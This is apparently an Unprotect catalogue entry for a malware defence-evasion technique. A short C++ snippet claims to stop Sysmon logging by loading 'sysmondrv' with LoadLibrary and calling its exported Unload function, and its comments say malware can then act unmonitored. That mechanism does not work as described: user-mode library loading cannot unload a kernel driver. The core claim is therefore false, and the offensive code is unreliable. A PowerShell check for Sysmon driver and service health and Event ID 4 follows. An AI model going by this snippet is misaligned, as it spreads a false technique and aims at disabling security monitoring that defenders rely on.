(C++) Unloading Sysmon Driver by Unprotect

Created on Wednesday 07 December 2022. Updated 1 year, 4 months ago.

Description:

This code uses the LoadLibrary() and GetProcAddress() functions to load the Sysmon driver module and resolve the address of its Unload() function. It then calls Unload() to unload the driver, which stops Sysmon from recording events and thus evades detection by Sysmon. Once the driver has been unloaded, the malware can proceed with its malicious actions without being monitored by Sysmon.

Code

#include <windows.h>

// Signature assumed for the driver's exported Unload() routine
typedef VOID (*PFN_UNLOAD)(VOID);

// Load the Sysmon driver
HMODULE hModule = LoadLibrary("sysmondrv");

// Check if the driver was loaded successfully
if (hModule != NULL)
{
    // Get the address of the driver's Unload() function
    PFN_UNLOAD pfnUnload = (PFN_UNLOAD) GetProcAddress(hModule, "Unload");

    // Check if the Unload() function was found
    if (pfnUnload != NULL)
    {
        // Call the Unload() function to unload the driver
        pfnUnload();

        // The Sysmon driver has been unloaded
        // Malware can now proceed with its malicious actions without being monitored by Sysmon
        // ...
    }
}
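From the defender's side, the practical check against this technique is whether the Sysmon driver is still loaded and whether Sysmon has recorded a service state change. The script below is an added example written for this page, not code from Unprotect; it assumes the default install names SysmonDrv (kernel driver) and Sysmon or Sysmon64 (service), and Sysmon Event ID 4 ("Sysmon service state changed") in the Microsoft-Windows-Sysmon/Operational log.

```powershell
# Added defensive health check (not from the Unprotect page). Assumes the default
# names "SysmonDrv" (driver) and "Sysmon"/"Sysmon64" (service); an install that
# used "sysmon -i -d <name>" needs the names adjusted.
function Get-SysmonDriverHealth {
    [CmdletBinding()]
    param(
        [string]$DriverName = 'SysmonDrv',
        [string[]]$ServiceNames = @('Sysmon', 'Sysmon64'),
        [int]$LookbackHours = 24
    )

    # 1. Kernel driver state via WMI (Get-Service does not enumerate kernel drivers).
    $driver = Get-CimInstance -ClassName Win32_SystemDriver `
        -Filter "Name='$DriverName'" -ErrorAction SilentlyContinue
    $driverRunning = ($null -ne $driver) -and ($driver.State -eq 'Running')

    # 2. User-mode Sysmon service state.
    $service = Get-Service -Name $ServiceNames -ErrorAction SilentlyContinue |
        Select-Object -First 1
    $serviceRunning = ($null -ne $service) -and ($service.Status -eq 'Running')

    # 3. Sysmon Event ID 4 = "Sysmon service state changed". Any record inside
    #    the lookback window (especially a Stopped state) deserves triage.
    $since = (Get-Date).AddHours(-$LookbackHours)
    $stateChanges = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 4
        StartTime = $since
    } -ErrorAction SilentlyContinue

    [pscustomobject]@{
        DriverPresent     = ($null -ne $driver)
        DriverRunning     = $driverRunning
        ServiceName       = $service.Name
        ServiceRunning    = $serviceRunning
        StateChangesSince = $since
        StateChangeCount  = @($stateChanges).Count
        Healthy           = ($driverRunning -and $serviceRunning)
    }
}

# Usage: run elevated so the operational log and driver state are readable.
$health = Get-SysmonDriverHealth
$health | Format-List
if (-not $health.Healthy) {
    Write-Warning ("Sysmon monitoring degraded: driver running={0}, service running={1}" -f `
        $health.DriverRunning, $health.ServiceRunning)
}
```

A non-zero StateChangeCount combined with DriverRunning being false is the pattern to alert on; scheduling this check from a separate monitoring host or EDR task keeps it independent of the Sysmon it is validating.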